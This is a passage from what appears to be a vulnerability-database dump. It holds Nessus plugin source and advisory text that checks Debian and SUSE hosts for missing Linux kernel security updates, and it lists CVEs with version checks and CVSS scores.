cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-source\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:48:58", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leaks or privilege\nescalation.\n\n - CVE-2013-7421 / CVE-2014-9644\n It was discovered that the Crypto API allowed\n unprivileged users to load arbitrary kernel modules. A\n local user can use this flaw to exploit vulnerabilities\n in modules that would not normally be loaded.\n\n - CVE-2014-7822\n Akira Fujita found that the splice() system call did not\n validate the given file offset and length. A local\n unprivileged user can use this flaw to cause filesystem\n corruption on ext4 filesystems, or possibly other\n effects.\n\n - CVE-2014-8160\n Florian Westphal discovered that a netfilter\n (iptables/ip6tables) rule accepting packets to a\n specific SCTP, DCCP, GRE or UDPlite port/endpoint could\n result in incorrect connection tracking state. If only\n the generic connection tracking module (nf_conntrack)\n was loaded, and not the protocol-specific connection\n tracking module, this would allow access to any\n port/endpoint of the specified protocol.\n\n - CVE-2014-8559\n It was found that kernel functions that iterate over a\n directory tree can dead-lock or live-lock in case some\n of the directory entries were recently deleted or\n dropped from the cache. A local unprivileged user can\n use this flaw for denial of service.\n\n - CVE-2014-9585\n Andy Lutomirski discovered that address randomisation\n for the vDSO in 64-bit processes is extremely biased. A\n local unprivileged user could potentially use this flaw\n to bypass the ASLR protection mechanism.\n\n - CVE-2014-9683\n Dmitry Chernenkov discovered that eCryptfs writes past\n the end of the allocated buffer during encrypted\n filename decoding, resulting in local denial of service.\n\n - CVE-2015-0239\n It was found that KVM did not correctly emulate the x86\n SYSENTER instruction. An unprivileged user within a\n guest system that has not enabled SYSENTER, for example\n because the emulated CPU vendor is AMD, could\n potentially use this flaw to cause a denial of service\n or privilege escalation in that guest.\n\n - CVE-2015-1420\n It was discovered that the open_by_handle_at() system\n call reads the handle size from user memory a second\n time after validating it. A local user with the\n CAP_DAC_READ_SEARCH capability could use this flaw for\n privilege escalation.\n\n - CVE-2015-1421\n It was found that the SCTP implementation could free an\n authentication state while it was still in use,\n resulting in heap corruption. This could allow remote\n users to cause a denial of service or privilege\n escalation.\n\n - CVE-2015-1593\n It was found that address randomisation for the initial\n stack in 64-bit processes was limited to 20 rather than\n 22 bits of entropy. A local unprivileged user could\n potentially use this flaw to bypass the ASLR protection\n mechanism.", "edition": 15, "published": "2015-02-24T00:00:00", "title": "Debian DSA-3170-1 : linux - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "modified": "2015-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DSA-3170.NASL", "href": "https://www.tenable.com/plugins/nessus/81449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3170. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81449);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-7421\", \"CVE-2014-7822\", \"CVE-2014-8160\", \"CVE-2014-8559\", \"CVE-2014-9585\", \"CVE-2014-9644\", \"CVE-2014-9683\", \"CVE-2015-0239\", \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_xref(name:\"DSA\", value:\"3170\");\n\n script_name(english:\"Debian DSA-3170-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, information leaks or privilege\nescalation.\n\n - CVE-2013-7421 / CVE-2014-9644\n It was discovered that the Crypto API allowed\n unprivileged users to load arbitrary kernel modules. A\n local user can use this flaw to exploit vulnerabilities\n in modules that would not normally be loaded.\n\n - CVE-2014-7822\n Akira Fujita found that the splice() system call did not\n validate the given file offset and length. A local\n unprivileged user can use this flaw to cause filesystem\n corruption on ext4 filesystems, or possibly other\n effects.\n\n - CVE-2014-8160\n Florian Westphal discovered that a netfilter\n (iptables/ip6tables) rule accepting packets to a\n specific SCTP, DCCP, GRE or UDPlite port/endpoint could\n result in incorrect connection tracking state. If only\n the generic connection tracking module (nf_conntrack)\n was loaded, and not the protocol-specific connection\n tracking module, this would allow access to any\n port/endpoint of the specified protocol.\n\n - CVE-2014-8559\n It was found that kernel functions that iterate over a\n directory tree can dead-lock or live-lock in case some\n of the directory entries were recently deleted or\n dropped from the cache. A local unprivileged user can\n use this flaw for denial of service.\n\n - CVE-2014-9585\n Andy Lutomirski discovered that address randomisation\n for the vDSO in 64-bit processes is extremely biased. A\n local unprivileged user could potentially use this flaw\n to bypass the ASLR protection mechanism.\n\n - CVE-2014-9683\n Dmitry Chernenkov discovered that eCryptfs writes past\n the end of the allocated buffer during encrypted\n filename decoding, resulting in local denial of service.\n\n - CVE-2015-0239\n It was found that KVM did not correctly emulate the x86\n SYSENTER instruction. An unprivileged user within a\n guest system that has not enabled SYSENTER, for example\n because the emulated CPU vendor is AMD, could\n potentially use this flaw to cause a denial of service\n or privilege escalation in that guest.\n\n - CVE-2015-1420\n It was discovered that the open_by_handle_at() system\n call reads the handle size from user memory a second\n time after validating it. A local user with the\n CAP_DAC_READ_SEARCH capability could use this flaw for\n privilege escalation.\n\n - CVE-2015-1421\n It was found that the SCTP implementation could free an\n authentication state while it was still in use,\n resulting in heap corruption. This could allow remote\n users to cause a denial of service or privilege\n escalation.\n\n - CVE-2015-1593\n It was found that address randomisation for the initial\n stack in 64-bit processes was limited to 20 rather than\n 22 bits of entropy. A local unprivileged user could\n potentially use this flaw to bypass the ASLR protection\n mechanism.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-7421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9644\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-7822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-8160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-8559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-0239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3170\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 3.2.65-1+deb7u2. Additionally this update fixes regressions\nintroduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon (a subset is fixed already).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux\", reference:\"3.2.65-1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:39:56", "description": "This update fixes the CVEs described below.\n\nA further issue, CVE-2014-9419, was considered, but appears to require\nextensive changes with a consequent high risk of regression. It is now\nunlikely to be fixed in squeeze-lts.\n\nCVE-2013-6885\n\nIt was discovered that under specific circumstances, a combination of\nwrite operations to write-combined memory and locked CPU instructions\nmay cause a core hang on AMD 16h 00h through 0Fh processors. A local\nuser can use this flaw to mount a denial of service (system hang) via\na crafted application.\n\nFor more information please refer to the AMD CPU erratum 793\nin\nhttp://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.\npdf\n\nCVE-2014-7822\n\nIt was found that the splice() system call did not validate the given\nfile offset and length. A local unprivileged user can use this flaw to\ncause filesystem corruption on ext4 filesystems, or possibly other\neffects.\n\nCVE-2014-8133\n\nIt was found that the espfix functionality can be bypassed by\ninstalling a 16-bit RW data segment into GDT instead of LDT (which\nespfix checks for) and using it for stack. A local unprivileged user\ncould potentially use this flaw to leak kernel stack addresses.\n\nCVE-2014-8134\n\nIt was found that the espfix functionality is wrongly disabled in a\n32-bit KVM guest. A local unprivileged user could potentially use this\nflaw to leak kernel stack addresses.\n\nCVE-2014-8160\n\nIt was found that a netfilter (iptables or ip6tables) rule accepting\npackets to a specific SCTP, DCCP, GRE or UDPlite port/endpoint could\nresult in incorrect connection tracking state. If only the generic\nconnection tracking module (nf_conntrack) was loaded, and not the\nprotocol-specific connection tracking module, this would allow access\nto any port/endpoint of the specified protocol.\n\nCVE-2014-9420\n\nIt was found that the ISO-9660 filesystem implementation (isofs)\nfollows arbitrarily long chains, including loops, of Continuation\nEntries (CEs). This allows local users to mount a denial of service\nvia a crafted disc image.\n\nCVE-2014-9584\n\nIt was found that the ISO-9660 filesystem implementation (isofs) does\nnot validate a length value in the Extensions Reference (ER) System\nUse Field, which allows local users to obtain sensitive information\nfrom kernel memory via a crafted disc image.\n\nCVE-2014-9585\n\nIt was discovered that address randomisation for the vDSO in 64-bit\nprocesses is extremely biassed. A local unprivileged user could\npotentially use this flaw to bypass the ASLR protection mechanism.\n\nCVE-2015-1421\n\nIt was found that the SCTP implementation could free authentication\nstate while it was still in use, resulting in heap corruption. This\ncould allow remote users to cause a denial of service or privilege\nescalation.\n\nCVE-2015-1593\n\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy. A\nlocal unprivileged user could potentially use this flaw to bypass the\nASLR protection mechanism.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 15, "published": "2015-03-26T00:00:00", "title": "Debian DLA-155-1 : linux-2.6 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2014-8134", "CVE-2014-9420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-9584", "CVE-2013-6885", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9585"], "modified": "2015-03-26T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg", "cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:firmware-linux-free", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-doc-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-manual-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-source-2.6.32", "p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-base", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-tools-2.6.32", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-libc-dev", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686"], "id": "DEBIAN_DLA-155.NASL", "href": "https://www.tenable.com/plugins/nessus/82138", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-155-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82138);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6885\", \"CVE-2014-7822\", \"CVE-2014-8133\", \"CVE-2014-8134\", \"CVE-2014-8160\", \"CVE-2014-9420\", \"CVE-2014-9584\", \"CVE-2014-9585\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_bugtraq_id(63983, 71650, 71684, 71717, 71883, 71990, 72061, 72347, 72356, 72607);\n\n script_name(english:\"Debian DLA-155-1 : linux-2.6 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVEs described below.\n\nA further issue, CVE-2014-9419, was considered, but appears to require\nextensive changes with a consequent high risk of regression. It is now\nunlikely to be fixed in squeeze-lts.\n\nCVE-2013-6885\n\nIt was discovered that under specific circumstances, a combination of\nwrite operations to write-combined memory and locked CPU instructions\nmay cause a core hang on AMD 16h 00h through 0Fh processors. A local\nuser can use this flaw to mount a denial of service (system hang) via\na crafted application.\n\nFor more information please refer to the AMD CPU erratum 793\nin\nhttp://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.\npdf\n\nCVE-2014-7822\n\nIt was found that the splice() system call did not validate the given\nfile offset and length. A local unprivileged user can use this flaw to\ncause filesystem corruption on ext4 filesystems, or possibly other\neffects.\n\nCVE-2014-8133\n\nIt was found that the espfix functionality can be bypassed by\ninstalling a 16-bit RW data segment into GDT instead of LDT (which\nespfix checks for) and using it for stack. A local unprivileged user\ncould potentially use this flaw to leak kernel stack addresses.\n\nCVE-2014-8134\n\nIt was found that the espfix functionality is wrongly disabled in a\n32-bit KVM guest. A local unprivileged user could potentially use this\nflaw to leak kernel stack addresses.\n\nCVE-2014-8160\n\nIt was found that a netfilter (iptables or ip6tables) rule accepting\npackets to a specific SCTP, DCCP, GRE or UDPlite port/endpoint could\nresult in incorrect connection tracking state. If only the generic\nconnection tracking module (nf_conntrack) was loaded, and not the\nprotocol-specific connection tracking module, this would allow access\nto any port/endpoint of the specified protocol.\n\nCVE-2014-9420\n\nIt was found that the ISO-9660 filesystem implementation (isofs)\nfollows arbitrarily long chains, including loops, of Continuation\nEntries (CEs). This allows local users to mount a denial of service\nvia a crafted disc image.\n\nCVE-2014-9584\n\nIt was found that the ISO-9660 filesystem implementation (isofs) does\nnot validate a length value in the Extensions Reference (ER) System\nUse Field, which allows local users to obtain sensitive information\nfrom kernel memory via a crafted disc image.\n\nCVE-2014-9585\n\nIt was discovered that address randomisation for the vDSO in 64-bit\nprocesses is extremely biassed. A local unprivileged user could\npotentially use this flaw to bypass the ASLR protection mechanism.\n\nCVE-2015-1421\n\nIt was found that the SCTP implementation could free authentication\nstate while it was still in use, resulting in heap corruption. This\ncould allow remote users to cause a denial of service or privilege\nescalation.\n\nCVE-2015-1593\n\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy. A\nlocal unprivileged user could potentially use this flaw to bypass the\nASLR protection mechanism.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n # http://support.amd.com/TechDocs/51810_16h_00h-0Fh_Rev_Guide.pdf\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5360cb0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/02/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/linux-2.6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firmware-linux-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-tools-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif 